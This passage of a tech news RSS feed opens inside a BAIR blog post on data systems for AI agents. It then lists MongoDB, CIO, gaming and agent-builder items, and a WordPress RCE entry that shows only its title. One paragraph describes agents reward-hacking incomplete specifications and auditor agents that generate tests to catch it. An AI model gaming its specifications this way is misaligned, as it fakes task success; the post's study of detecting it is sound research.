<p><strong>Data Systems <em>For</em> Agents.</strong> Agents will soon become the dominant workload for data systems—with swarms of agents spun up in response to each end-user request. Given differences in characteristics between agents and humans—or applications acting on their behalf—<em>how should we redesign data systems for such agentic users?</em></p>

<p><strong>Data Systems <em>Of</em> Agents.</strong> As agents start taking on the bulk of knowledge work, a new substrate is needed for thousands of agents to manage state over long-running tasks, coordinate and reach consensus, and deal with failures. <em>What do data systems that reliably and efficiently run and manage agent swarms look like?</em></p>

<p><strong>Data Systems <em>By</em> Agents.</strong> Agents are rapidly becoming capable of synthesizing entire data systems in one go—meaning we can rebuild custom systems for each new workload. Verifying that such systems match intended behavior is a challenge. <em>What does it take to let agents synthesize data systems we can actually trust?</em></p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/for-of-by-agents.png" alt="A database character and a robot agent holding up a triangle labeled 'of', 'for', and 'by'" width="500"><br>
<i>
Data Systems For, Of, and By Agents
</i>
</p>

<p>Next, we will discuss each in more detail, followed by discussing the intertwined future of data systems and agents, especially as the three challenges intersect.</p>

<h2>Data Systems For Agents</h2>

<p>An agent querying a database doesn’t behave like a person or a BI tool. It performs what we call <a href="https://arxiv.org/abs/2509.00997"><em>agentic speculation</em></a>: a high-volume, heterogeneous stream of work spanning schema introspection, columnar exploration, partial and then full query formulation. With multiple agents each exploring portions of the hypothesis space, each user request could amount to 1000s of individual SQL queries. Now, users can issue ‘high-level’ data tasks, e.g., root-cause analysis—e.g., ‘why did coffee sales in Berkeley drop this year’—or exploratory cohort analysis—e.g., ‘which user segments are most likely to churn next quarter’—each involving a combinatorial space of potential joins, aggregations, and filter combinations.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image5.png" alt="An agent sending many SELECT SQL queries to a database and receiving results back" width="600"><br>
<i>
Data Systems Redesigned to More Effectively Support Agentic Speculation
</i>
</p>

<p>The requests from these agents have various opportunities for optimization. For instance, on a text-to-SQL benchmark with multiple agents attempting each task, only 10-20% of the sub-plans are distinct. Thus, 80-90% of sub-queries perform duplicate work. The same experiments show task success rates significantly increasing with more agentic attempts—so the redundancy is actually helpful. But from the data system perspective it’s wasted work.</p>

<p>An agent-first data system can exploit such properties to help agents make progress faster. It can reuse results across overlapping sub-plans, drawing on ideas from decades-old literature on <a href="https://dl.acm.org/doi/10.1145/42201.42203">multi-query optimization</a> and <a href="https://www.vldb.org/conf/2007/papers/research/p723-zukowski.pdf">shared scans</a>. Or the data system can try to <em>satisfice</em>, returning approximate answers that are good enough for agents to make progress, leveraging work from <a href="https://dl.acm.org/doi/10.1145/253260.253291">the</a> <a href="https://dl.acm.org/doi/10.1145/2465351.2465355">AQP</a> <a href="https://dl.acm.org/doi/10.1561/1900000004">literature</a>—or streaming the results of the final or intermediate operators to help agents decide if seeing the rest is necessary or helpful.</p>

<p>Another opportunity here is to rethink the query interface entirely: instead of agents issuing a single SQL query at a time, they could instead issue a batch of queries, each with its own approximation requirements. Since enumerating an exponential search space (as in the root cause or cohort analysis examples above) isn’t a good use of agentic reasoning ability, perhaps data systems should support higher-level primitives rather than requiring agents to list each SQL query explicitly. One idea here is to draw on <a href="https://docs.getdbt.com/docs/build/jinja-macros">DBT-style Jinja macros</a> to provide looping-based primitives for agents to interact with data systems.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image2.png" alt="A swarm of AI agents working at laptops" width="450"><br>
<i>
A Caffeinated Army of Agents Ready to Tirelessly Complete Your Data Tasks
</i>
</p>

<p>A final opportunity here is to stop thinking of data systems as passive executors of queries; data systems could be <a href="https://arxiv.org/abs/2502.13016">proactive</a>, as they possess more grounding in data and system characteristics that agents may lack a priori—they could steer agents in different directions, provide results for related queries, and also provide performance-level feedback (e.g., instead of executing an expensive query, the system could first provide the agent a latency estimate). The reason we can do this now as opposed to the past is that an agent can accept any form of textual feedback and isn’t expecting a strict SQL query result. In fact, the data system could also prepare both materialized and virtual views for an agent in advance, provided to the agent as part of context, as this may be cheaper or more effective than having an agent author or use them.</p>

<h2>Data Systems Of Agents</h2>

<p>Previously, we focused on how agents interact with data systems. Now, we consider everything else agents need to keep working: where they live, how they remember, how they coordinate with each other, and how they deal with failures of each other. This <em>agentic substrate</em> is separate from the inference stack powering raw intelligence. However, the inference stack itself is being abstracted away through APIs (e.g., from OpenAI or Anthropic), or, for open-weight models, through <a href="https://github.com/vllm-project/vllm">serving</a> <a href="https://github.com/sgl-project/sglang">frameworks</a> that hide low-level details. So far, the agentic substrate has been managed through harnesses like <a href="https://www.anthropic.com/claude-code">Claude Code</a> and <a href="https://github.com/openai/codex">Codex</a>, coupled with various mechanisms to <a href="https://mem0.ai/">store</a> and <a href="https://www.letta.com/">retrieve</a> memory.</p>

<p>First, on the memory front, the current wisdom is that <a href="https://www.amplifypartners.com/blog-posts/file-systems-for-agents">files</a> <a href="https://lsvp.com/stories/filesystemsforagents/">are all you need</a>; agents write to unstructured markdown (MD) files, which can then be searched using grep, or via embedding-based retrieval. In fact, many argue that the solution to continual learning is having agents consume a lot (e.g., an entire codebase, slack, company wikis, …) and then write their learnings into MD files, which are then retrieved selectively on demand. Indeed, file systems, bash scripting, and MD files are and will still be important for agents. However, at scale, when agents are doing the vast majority of knowledge work, this approach will no longer be effective.</p>

<p>Given limited context windows, retrieving all MD file fragments that may be relevant and stuffing it into the context will break down at some point. Even if context windows continue to grow, there are latency benefits to not put all information into context — and in many cases, e.g., when knowledge work involves interacting with large databases or code bases, it will be infeasible to serialize all relevant data into context.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/substrate-for-agent-swarms.png" alt="A swarm of robot agents holding hands, each drawing state from a single large shared database platform below them" width="500"><br>
<i>
Data Systems As A Substrate for Multi-Agent Swarms
</i>
</p>

<p>One could use a <a href="https://mem0.ai/">knowledge</a> <a href="https://www.getzep.com/">graph</a> <a href="https://langchain-ai.github.io/langmem/">representation</a>, but knowledge graphs suffer from the same limitations as unstructured MD-based memory due to their lack of structured search. What one needs is to be able to retrieve only memory that is pertinent to the task, across multiple attributes (or facets) of interest. For example, an agent debugging a flaky test should be able to pull only the memories tagged with the relevant module, language, framework, and failure mode—rather retrieving based on keywords or embedding similarity. A separate issue is what to actually retrieve; raw agent traces with mistakes are not very useful as they will induce agents to repeat the same mistake—instead, we want the retrieved memory to be corrective.</p>

<p>We recently explored a related notion of <a href="https://arxiv.org/abs/2602.13521"><em>structured memory</em></a>, where we organize memory across various attributes, each of which could be set as <code class="language-plaintext highlighter-rouge">*</code> to indicate universal applicability, or set as a list of values to be matched. For a data agent, the dimensions could include the columns and tables, type of operation, and finally, open-ended natural-language corrective instructions. So, we could include memory that only applies to a given type of operation (e.g., ‘when performing date-time operations, use fiscal year as opposed to calendar year conventions’), or a given table (e.g., ‘column product_cleaned is preferred over column product when querying on product name’). One open question is defining an <em>application-specific structured memory</em>—or what others have called <a href="https://www.linkedin.com/feed/update/urn:li:activity:7467499112523804672/">world models for memory</a>. We believe this is akin to defining a schema for each application—and perhaps agents themselves can help us define and refine it over time.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/structured-knowledge.png" alt="Diagram showing corrective knowledge stored with structured attributes (SQL keywords, tables, columns, data type) and retrieved by matching the features of a new agent query" width="100%"><br>
<i>
One Possible Way To Store and Retrieve Structured Knowledge <a href="https://arxiv.org/abs/2602.13521">[From Here]</a>
</i>
</p>

<p>Structured memory will be useful also for <a href="https://github.com/skydiscover-ai/skydiscover">evolutionary</a> <a href="https://arxiv.org/abs/2506.13131">frameworks</a> to effectively manage search spaces. Indeed, storing, structuring, and mining large volumes of single and <a href="https://sky.cs.berkeley.edu/project/mast/">multi-agent traces</a> can help future agents become much more efficient—potentially enabling effective recursive self-improvement through structured memory-based mechanisms.</p>

<p>Another challenge is to support concurrent edits to shared memory, and concurrent edits in general, when there are many agents performing transformations. While there have been some useful attempts at <a href="https://dl.acm.org/doi/10.1145/3702634.3702955">supporting</a> <a href="https://neon.com/docs/get-started/why-neon">multiversioning</a> and <a href="https://docs.turso.tech/agentfs/introduction">copy-on-write semantics</a>, it isn’t clear that such techniques will suffice when thousands of agents are attempting to edit shared state at the same time. For instance, when agents are trying various potential transactions in response to a user request, the effects of the vast majority of these transactions need to be rolled back—with only the one ‘correct’ transaction’s result persisting. Work on supporting exactly-once semantics is relevant here, as are underlying techniques based on CRDTs and operational transformation. For updates to fuzzy mechanisms such as memory, we may be able to sacrifice on consistency for perfect correctness in the interest of latency. While agents can reason about semantics to compensate or roll back their actions to eventually finalize most tasks, the primary challenge lies in the degree to which they step on each other’s toes during the process. An important failure mode to be avoided is a form of “livelock,” where incessant compensating actions prevent any meaningful progress.</p>

<p>Beyond shared state, other concerns emerge when trying to support an army of agents, including what to do when agents fail, how agents should communicate with each other (directly or through intermediate shared state), and how we should deal with straggler agents. There have been some developments in supporting durable multi-agent execution, such as <a href="https://temporal.io/solutions/ai">Temporal</a>, but it remains to be seen if such solutions will apply at scale across thousands of agents. On the topic of communication, we need mechanisms to enable agents to negotiate with each other. Imagine four developer agents attempting to reach consensus on a shared schema, with distinct but overlapping objectives. In a human setting, this would involve iterative discussion and compromise; for agentic swarms, we must define the mechanisms that allow them to converge on a design that reflects the underlying goals of their respective principals. Or if agents are all requiring access to a limited resource, again communication will be necessary. It remains to be seen if this is best done via centralized coordination, or if a decentralized approach is necessary.</p>

<h2>Data Systems By Agents</h2>

<p>Finally, if intelligence is effectively free, then we can employ this intelligence to synthesize new data systems from scratch. Indeed, in many settings, general-purpose data systems may be overkill, as they have to support every schema, query, and hardware target. Given a workload, recent work, including <a href="https://arxiv.org/abs/2603.02001">Bespoke OLAP</a> and <a href="https://arxiv.org/abs/2603.02081">GenDB</a>, has shown that one can use an agentic pipeline to synthesize a complete, workload-specific analytical engine—in minutes to a few hours, at a cost of a few dollars. The engines are disposable: when the workload shifts, one can simply regenerate them. Analogously, our work has shown that one can synthesize custom <a href="https://arxiv.org/abs/2605.24096">key-value stores</a> from scratch, targeted to the workload. In fact, modern IDEs, such as <a href="https://kiro.dev/">Kiro</a>, elevate specifications for systems development to be a first-class citizen.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/synthesize-from-scratch.png" alt="A robot agent with a hammer and chisel carving a database character out of a block of stone" width="500"><br>
<i>
Agents Can Synthesize Custom Data Systems From Scratch
</i>
</p>

<p>The main issue, however, is that specifications are typically imperfect, and don’t cover all corner cases. Present-day agents will exploit the missing specifications to reward-hack their way to a high performance metric. In our custom key-value store work, we found that one way to alleviate this is to have auxiliary verification agents trying to generate test cases that catch the exploitation of corner cases, essentially expanding the specification. Yet another approach is to both generate a system and a proof for its correctness together, for which we have found some <a href="https://arxiv.org/abs/2605.23109">early success</a>, but more needs to be done to solidify the approach. Further, it remains to be seen what is the best way to solicit human-written specifications for a system—can this be done in an iterative, human-in-the-loop manner, as opposed to a one-shot, incomplete one. Indeed, human-written specifications are incomplete even for manually authored software, so one would expect that future agents that are more aligned will increasingly exercise better judgement when making design decisions.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/synthesis-pipeline.png" alt="Pipeline diagram where a system builder provides a specification, planner and coder agents generate code, the code is evaluated for correctness and performance, and critic and auditor agents provide feedback and catch reward hacking" width="100%"><br>
<i>
One Possible Data System Synthesis Pipeline <a href="https://arxiv.org/abs/2605.24096">[From Here]</a>
</i>
</p>

<p>Other questions here involve testing whether starting from a mature system (e.g., Postgres) and removing components/functionality can lead to higher performance or more user trust. Separately, is there an opportunity to make the design composable, comprising various verified components that are mixed and matched given a workload? For example, perhaps the workload hasn’t changed enough for the storage layer to be updated, but perhaps the query optimizer requires changes. A perhaps more viable proposition involves employing agents coupled with proof systems to target critical parts of the code associated with formal proofs, rather than doing so for the entire system.</p>

<p>A final opportunity here is to move away from the traditional data systems stack with clearly-defined interfaces (e.g., parser, query optimizer, storage manager, …) — that were each largely the prerogative of a single human team to manage. Instead, agents can find new ways to “blend” these components together, perhaps identifying new optimization opportunities as a result. Agents can also fill in missing gaps in functionality to make existing systems much more feature-complete, or reach feature-parity with other competing systems—or analogously, continuously refining open-source systems in response to feature requests or issues (perhaps filed by other agents!) Doing so in a way that prioritizes correctness, long-term maintenance, and human interpretability will be a challenge.</p>

<h2>Looking Further Ahead</h2>

<p>In the era of near-free intelligence, data systems matter more than ever. As agents take on the bulk of knowledge work, the workload for data systems will change, the substrate they need to run on will have to be built, and increasingly, they will participate in designing data systems themselves. Each of these shifts opens up a new, exciting research agenda.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/co-evolution.png" alt="A half-database, half-robot character next to a yin-yang symbol formed by a database and a robot agent" width="600"><br>
<i>
Co-Evolution of Data Systems and Agents
</i>
</p>

<p>Looking further out, the boundaries between agents and data systems will likely start to blur. For instance, agents may design the data systems they themselves run on, defining both the interfaces as well as the system components underneath. Both the interfaces and internals can be evolved over time by agents in a form of recursive self-improvement. There is also an opportunity to rethink data systems as a holistic source of truth for the entirety of relevant state: including raw data, memory, and coordination state, further erasing the distinctions between the data that is being queried by agents and data generated as a result of agentic activity. Finally, data systems may themselves incorporate agentic components, fundamentally evolving from passive computation engines into intelligent, proactive, self-optimizing architectures. It is hard to predict what the future may hold. We’re in for a wild ride!</p>

<h2>Acknowledgments</h2>

<p>The perspective and ongoing work described in this post are the product of joint research and many discussions with wonderful collaborators at the <a href="https://epic.berkeley.edu/">EPIC Data Lab</a>, <a href="https://dsf.berkeley.edu/">Data Systems &amp; Foundations</a> group, and the broader Berkeley AI-Systems community. Thank you all!</p>

<p>BibTex for this post:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@misc{intelligence-is-free-blog,
  title={Intelligence is Free, Now What? Data Systems for, of, and by Agents},
  author={Aditya G. Parameswaran and Shubham Agarwal and Kerem Akillioglu and Shreya Shankar
          and Sepanta Zeighami and Rishabh Iyer and Matei Zaharia and Alvin Cheung
          and Natacha Crooks and Joseph Gonzalez and Joseph Hellerstein and Ion Stoica},
  howpublished={\url{https://bair.berkeley.edu/blog/2026/07/07/intelligence-is-free-now-what/}},
  year={2026}
}
</code></pre></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Digital-native startups are ditching rigid databases for their agentic stacks     ]]></title>
<description><![CDATA[Presented by MongoDBThe gap between what AI models and agents can produce and what legacy infrastructure can reliably support is known as architectural drag, and it is the defining bottleneck of the agentic era. The data layer underneath an agentic system must handle variable schemas, vector embe...]]></description>
<link>https://tsecurity.de/de/3652101/it-nachrichten/digital-native-startups-are-ditching-rigid-databases-for-their-agentic-stacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652101/it-nachrichten/digital-native-startups-are-ditching-rigid-databases-for-their-agentic-stacks/</guid>
<pubDate>Tue, 07 Jul 2026 18:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by MongoDB</i></p><hr><p>The gap between what AI models and agents can produce and what legacy infrastructure can reliably support is known as architectural drag, and it is the defining bottleneck of the agentic era. </p><p>The data layer underneath an agentic system must handle variable schemas, vector embeddings, real-time retrieval, and multi-tenant scale, often simultaneously and without human intervention to manage migrations — but traditional relational databases weren't natively designed for document flexibility or AI capabilities. Fixed schemas require manual updates every time an AI agent introduces a new data shape, while separate vector databases add latency and synchronization overhead.</p><p>Three digital-native startups — Huntr, Modelence, and Tavily — solved this problem the same way: by building on MongoDB Atlas, a unified database platform with native vector search, hybrid search, and managed autoscaling. Their experiences define what an agent-native data stack looks like in production, and why using Atlas enables developers to easily build complex AI native companies.</p><h2>Modelence: Building the agent-native cloud</h2><p>Modelence is an AI app builder with an open-source framework designed specifically for agent-native development, enabling anyone to build and deploy production-ready web applications, including APIs and databases, in minutes. The company recognized early that most backend infrastructure was built for humans, not AI, and that the rigid schema management and complex migrations of traditional systems create operational drag that causes agents to fail when trying to build production-ready apps.</p><p>“Choosing MongoDB helped us keep everything in a single place, which is an important property of what we strive to do for our own users," says Aram Shatakhtsyan, co-founder and CEO of Modelence. "Live data streams, vector search, all as part of the main database. For AI agents, it’s especially important to have a single platform where everything can be done, because connecting multiple platforms together makes it more error prone.”</p><p>Modelence standardized on MongoDB Atlas because its document model aligns with how AI agents process and generate data, allowing schemas to evolve rapidly without manual migrations. The platform pairs that flexibility with a typed schema layer on top, a deliberate architectural decision. </p><p>“MongoDB’s document model enables us to both keep things simple and at the same time decide how structured we want everything to be," Shatakhtsyan says. We still add a typed schema on top, which tremendously improves the accuracy at which AI can generate fully working, reliable web apps."</p><p>The TypeScript integration has been especially consequential, he adds. </p><p>“Because MongoDB types and values can be directly translated to TypeScript, it becomes an extension of the Modelence framework and our App Builder has a single source of truth for both app logic and database,” Shatakhtsyan explains.</p><p>The result is a platform that can move from planning to a running live feature in minutes with significantly fewer regressions. That speed and reliability helped Modelence raise $3 million in seed funding and successfully launch an AI-native app builder that handles the entire application lifecycle end-to-end.</p><h2>Tavily: The web access layer for agents     </h2><p>Tavily is the search API purpose-built for AI agents, connecting them to real-time, accurate web knowledge and keeping them grounded in what's actually happening, not in static training data. At Tavily's scale, every agent request authenticates, retrieves, and meters without friction. That demanded backend infrastructure built to absorb change without breaking.</p><p>“On the user side, every agent request authenticates and meters against it," says Tomer Weiss, Data Team Lead at Tavily. "On the data side, we use it to track the lifecycle of every document we’ve ever touched: when it was fetched, how stale it is, what the freshness signals were and how popular it is. MongoDB’s flexible schema let us keep evolving those records without migrations as new metrics and features came along.”</p><p>That living record is what keeps agents grounded in reality. Multi-tenancy at Tavily's scale means managing millions of API keys, distinct usage profiles, plan tiers, and regional residency requirements. They built for that complexity from day one. </p><p>“We separated concerns across clusters early: a user/account cluster optimized for low-latency authentication and usage writes, and a sharded cluster for document state where the scaling axis is URLs, not users," Weiss explains. "That separation has paid off.”</p><p>The most critical lesson is about choosing infrastructure that doesn’t punish change, and that flexibility compounds, he says. </p><p>"The AI space moves so fast that change is our norm," he explains.  "For a company serving AI agents, where the workloads themselves keep changing shape, choosing a data platform that doesn’t punish change has turned out to be more valuable than any single feature.”
</p><h2>Huntr: From job tracker to AI career platform</h2><p>Huntr.co, an AI resume building and tailoring platform, helps more than 500,000 job seekers across 190 countries craft stronger applications and manage their search. For a lean, three-person engineering team, the challenge was finding a data foundation flexible enough to store the full complexity of a person’s career history in a structure that AI could read, reason about, and generate from natively.</p><p>“The kinds of career data we are gathering at Huntr naturally aligns with MongoDB’s document model," says Trevor McCann, senior software engineer at Huntr. "The core problem we’re solving with AI job search tools is how to surface the qualities of a candidate that make them unique. We need to be ready to store whatever kinds of data the candidate wants to include in their materials.”</p><p>Huntr built its AI Resume Builder on MongoDB Atlas, where the document model mirrors the natural shape of career data: deeply nested, variable across candidates, and constantly evolving as the platform ships new features. MongoDB Search on Atlas handles core search needs while MongoDB Vector Search powers the <a href="https://huntr.co/product/resume-tailor"><u>Job Tailoring</u></a> feature, which puts a candidate’s stored career profile side by side a specific job description and uses semantic matching to generate a resume optimized for that role.</p><p>The integrated capabilities have had a direct impact on how quickly the team can ship, McCann says. </p><p>“MongoDB’s hybrid search allows us to seamlessly query across literal and semantic text matches, a must-have when working with such diverse data,” McCann says. “This is something we could piece together using other solutions but with MongoDB it’s ready to go on top of our existing data layer.”
The consolidation of database, search, and vector capabilities into a single platform is what allows the team to punch above its weight. Huntr considers MongoDB the fourth member of its engineering team, McCann adds. </p><p>Looking ahead, the platform is building toward AI that learns from a candidate’s full professional history over time, delivering more personalized guidance with every interaction.</p><h2>The digital native blueprint</h2><p>These success stories become a definitive "digital native blueprint" for the agentic era, built on three core pillars. First, by unifying database, search, and vector storage into a single platform, these startups have effectively eliminated the architectural tax of complex data schemas that typically slows down development. This consolidation enables a level of fluidity that is now non-negotiable; AI agents require a modern data platform that can adapt as quickly as a natural language prompt evolves. </p><p>The winners of the AI era will be the ones who build the most performant, durable, and flexible systems to support those models in production. As agentic workflows grow more sophisticated, the data foundation determines how fast a team can ship, how reliably agents can operate, and how quickly the platform can adapt when the landscape shifts again. </p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Bricks Builder Theme  -  RCE]]></title>
<description><![CDATA[WordPress Bricks Builder Theme  -  RCE]]></description>
<link>https://tsecurity.de/de/3651708/poc/webapps-wordpress-bricks-builder-theme-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651708/poc/webapps-wordpress-bricks-builder-theme-rce/</guid>
<pubDate>Tue, 07 Jul 2026 15:38:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Bricks Builder Theme  -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[Build or buy? Smart CIOs know the answer for AI talent]]></title>
<description><![CDATA[The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.



With AI skills both the highest in demand and the hardest to hire for, many IT leaders and their C-suite colleagues ...]]></description>
<link>https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.</p>



<p>With AI skills both the <a href="https://www.cio.com/article/4096592/the-10-hottest-it-skills-for-2026.html">highest in demand</a> and <a href="https://www.cio.com/article/4184685/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed.html">the hardest to hire for</a>, many IT leaders and their C-suite colleagues are rolling out comprehensive <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">AI training programs</a> for employees, both for the IT pros who build AI tools and the business users who will use them.</p>



<p>Smart companies will need to invest heavily in upskilling, says <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" rel="nofollow">Chris Campbell</a>, CIO at DeVry University. “The pace of change is simply too fast to rely solely on external hiring,” he says. “Organizations that develop AI capabilities across their existing workforce will have an advantage over those trying to win a bidding war for a relatively small pool of experts.”</p>



<p>Moreover, the key elements of what leads to a beneficial AI deployment has changed over time, he says.</p>



<p>“Early on, everyone was worried about access to AI tools,” Campbell adds. “Today, the tools are everywhere. What I see organizations struggling with is figuring out how to apply them to real business problems and integrate them into how work actually gets done.”</p>



<p>At DeVry, some of the strongest AI advocates don’t come from traditional AI backgrounds, but from software engineering, business analysis, cybersecurity, project management, and operations, he says.</p>



<p>“They understand the business, know where the friction points are, and can see where AI can create value,” he adds. “Those skills are often more important than deep expertise in a particular model or tool.”</p>



<p>Experienced <a href="https://www.cio.com/article/230935/hiring-the-most-in-demand-tech-jobs-for-2021.html">AI talent is difficult to find</a>, especially when IT leaders seek candidates who have successfully transitioned AI initiatives from experimentation to production.</p>



<p>“I don’t think every company needs to build a large team of AI specialists,” Campbell says. “In many cases, the people best positioned to drive AI adoption are already inside the organization.”</p>



<h2 class="wp-block-heading">Upskilling for an AI builder culture</h2>



<p>Professional services and accounting firm KPMG is addressing its AI talent challenge by providing widespread AI training to employees, says <a href="https://www.linkedin.com/in/rema-serafi/" rel="nofollow">Rema Serafi</a>, vice chairwoman for tax operations there. Many organizations’ major AI problem in 2026 is a lack of talent, not a lack of technology, she adds.</p>



<p>Forty percent of CIOs surveyed for this year’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO report</a> cited <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">lack of in-house talent as a top impediment</a> to implementing their AI strategies.</p>



<p>To address this, KPMG has piloted a six-week AI training program, with the goal of enabling all employees to deploy their own AI tools, Serafi says. The program familiarizes employees with Python and other technologies that serve as building blocks for internal AI tools, she says.</p>



<p>KPMG also revamped its team structures to ensure that three categories of employees — AI power users, makers, and builders — work closely together, says Serafi.</p>



<p>“Everyone’s going to have access to our tools, and everyone’s going to be a power user,” she says, “to the extent that those professionals who didn’t come in with AI capabilities, who didn’t come in as engineers or technologists, if they want to learn, we’re going to certify them to build tools as well.”</p>



<p>Deploying sophisticated, best-in-class AI tools without training employees is like buying an F1 racing car but not hiring a professional driver, she says.</p>



<p>“If we don’t have professionals who know how to use it, they’re not going to be able to maximize the benefit of what’s available to them,” Serafi adds.</p>



<p>KPMG commissioned a study with the University of Texas and found that employees who use AI regularly produce higher-quality work and feel less stressed. Employees who are expert users of AI will progress faster in their careers, she suggests. One challenge for training programs, though, is keeping up with how fast AI is evolving.</p>



<p>“The roles are actually changing in a short period of time,” she says. “When you used to see traditional engineers working with AI, now you see professionals who can actually guide, shape, and direct AI in their client work.”</p>



<h2 class="wp-block-heading">Retraining: ‘The only realistic path forward’</h2>



<p>Another fan of comprehensive AI training for employees is <a href="https://www.linkedin.com/in/elmerm/" rel="nofollow">Elmer Morales</a>, founder and CEO of agentic AI coding startup koder.com. Finding outside AI talent has become extremely difficult for most companies, he says.</p>



<p>“Retraining isn’t optional anymore,” he says. “It’s the only realistic path forward for most organizations. The external talent market can’t supply what every company simultaneously needs, and waiting for universities to catch up isn’t a strategy.”</p>



<p>Companies that succeed with AI treat upskilling as a core investment, not just an HR initiative, Morales adds.</p>



<p>“The talent gap is the single most concrete ceiling on AI ambition right now,” he says. “Companies can buy the best models, the best infrastructure, and the best tooling, and still produce nothing of value because they don’t have the people who know how to wire it all together into something that actually works in production.”</p>



<p>Morales suggests that IT leaders look to their existing engineering team to build AI deployment talent.</p>



<p>“The engineers already obsessed with this on nights and weekends, who are shipping personal projects and experimenting with new models, those people just need permission, resources, and a real problem to solve,” he says. “The best AI teams I’ve seen weren’t built by recruiting, but by creating the conditions for the right people to step forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Giant creature city builder The Wandering Village is getting a watery DLC]]></title>
<description><![CDATA[The Wandering Village: The Last Leviathan is an upcoming water-themed DLC for the unique city builder that brings a whole lot of new content.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3650875/linux-tipps/giant-creature-city-builder-the-wandering-village-is-getting-a-watery-dlc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650875/linux-tipps/giant-creature-city-builder-the-wandering-village-is-getting-a-watery-dlc/</guid>
<pubDate>Tue, 07 Jul 2026 10:26:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Wandering Village: The Last Leviathan is an upcoming water-themed DLC for the unique city builder that brings a whole lot of new content.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/624607594id29340gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/giant-creature-city-builder-the-wandering-village-is-getting-a-watery-dlc/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten No-Code AI Agent Builder 2026: 6 Dienste im direkten Vergleich]]></title>
<description><![CDATA[Mit einem No-Code-AI-Agent-Builder habt ihr Zugriff auf über 100 KI-Modelle in einem einzigen günstigen Abo. Welcher Dienst der beste ist, verrät dieser Vergleich.
																					Dieser Artikel wurde einsortiert unter 
																	Internet & Netzwelt,																	In eigener Sache,	...]]></description>
<link>https://tsecurity.de/de/3650478/it-nachrichten/die-besten-no-code-ai-agent-builder-2026-6-dienste-im-direkten-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650478/it-nachrichten/die-besten-no-code-ai-agent-builder-2026-6-dienste-im-direkten-vergleich/</guid>
<pubDate>Tue, 07 Jul 2026 06:33:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit einem No-Code-AI-Agent-Builder habt ihr Zugriff auf über 100 KI-Modelle in einem einzigen günstigen Abo. Welcher Dienst der beste ist, verrät dieser Vergleich.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/internet/internet-netzwelt.html">Internet &amp; Netzwelt</a>,																	<a href="https://www.netzwelt.de/newsletter/index.html">In eigener Sache</a>,																	<a href="https://www.netzwelt.de/in-eigener-sache/sponsored-post/index.html">Sponsored Post - Anzeige</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside Elastic InfoSec's agentic SOC: Choosing the right agent architecture for a 5x cost reduction]]></title>
<description><![CDATA[We ran two agentic SOC architectures head to head across 36,822 real Agent Builder conversations. One won by 5.7x: a specialized workflow triaging alerts for $0.69 each, against $3.42 for a single agent juggling 14 Skills. The data and the decision framework are both below.]]></description>
<link>https://tsecurity.de/de/3649760/it-security-nachrichten/inside-elastic-infosecs-agentic-soc-choosing-the-right-agent-architecture-for-a-5x-cost-reduction/</link>
